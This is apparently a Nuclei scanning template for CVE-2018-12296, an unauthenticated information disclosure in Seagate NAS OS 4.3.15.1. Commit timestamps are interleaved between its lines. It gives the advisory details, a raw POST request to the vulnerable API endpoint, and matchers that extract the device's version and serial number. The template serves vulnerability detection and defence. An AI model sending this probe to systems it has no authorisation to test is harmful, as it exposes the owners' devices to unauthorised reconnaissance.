2022-03-14 10:28:20 +00:00
id : CVE-2018-12296
2022-04-22 10:38:41 +00:00
2022-03-14 10:28:20 +00:00
info :
2022-03-14 12:16:34 +00:00
name : Seagate NAS OS 4.3.15.1 - Server Information Disclosure
2022-03-14 10:28:20 +00:00
author : princechaddha
severity : high
2022-07-05 18:13:40 +00:00
description : Seagate NAS OS version 4.3.15.1 has insufficient access control which allows attackers to obtain information about the NAS without authentication via empty POST requests in /api/external/7.0/system.System.get_infos.
2023-09-06 12:57:14 +00:00
remediation : |
Upgrade to a patched version of Seagate NAS OS.
2022-03-14 10:28:20 +00:00
reference :
- https://blog.securityevaluators.com/invading-your-personal-cloud-ise-labs-exploits-the-seagate-stcr3000101-ecf89de2170
- https://nvd.nist.gov/vuln/detail/CVE-2018-12296
2022-03-14 19:05:47 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 7.5
2022-03-14 19:05:47 +00:00
cve-id : CVE-2018-12296
cwe-id : CWE-732
2023-08-31 11:46:18 +00:00
epss-score : 0.01503
epss-percentile : 0.85298
2023-09-06 12:57:14 +00:00
cpe : cpe:2.3:o:seagate:nas_os:4.3.15.1:*:*:*:*:*:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : seagate
product : nas_os
tags : cve,cve2018,seagate,nasos,disclosure,unauth
2022-03-14 10:28:20 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-03-14 10:28:20 +00:00
- raw :
- |
POST /api/external/7.0/system.System.get_infos HTTP/1.1
Host : {{Hostname}}
Referer : {{BaseURL}}
matchers :
- type : word
part : body
words :
- '"version":'
- '"serial_number":'
condition : and
extractors :
- type : regex
group : 1
regex :
- '"version": "([0-9.]+)"'
2023-07-11 19:49:27 +00:00
part : body